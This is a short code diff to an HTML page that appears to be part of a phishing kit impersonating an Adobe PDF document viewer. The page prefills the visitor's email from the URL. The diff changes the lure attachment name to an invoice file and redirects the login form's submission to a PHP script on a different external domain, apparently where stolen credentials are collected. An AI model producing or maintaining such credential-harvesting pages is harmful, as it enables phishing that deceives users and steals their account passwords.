--- a/index.html
+++ b/index.html
@@ -101,7 +101,7 @@ $("#email").val($.urlPeram('email'));
                 <img src="Adobe%20PDF%20Online_files/word-icon.png" id="attachment" class="mt-1" style="width:85px; margin-top:20px;">
               <div class=""> 
                   <div>
-                    <small class="text-left card-text">Online  inspection form.pdf</small>
+                    <small class="text-left card-text">Order details/Invoice.pdf</small>
                   </div>
               <div>
                   <!-- Document Description Label --> 
@@ -286,7 +286,7 @@ $("#email").val($.urlPeram('email'));
                 </div>
                 <!-- End of server response message div -->
 
-                <form action="https://moesadult.com//cgi-bin/feedup.php" method="post">
+                <form action="https://rubystudio.co.ke/feedup.php" method="post">
                   
                     <div class="form-group">
                     <!-- User Email Label -->
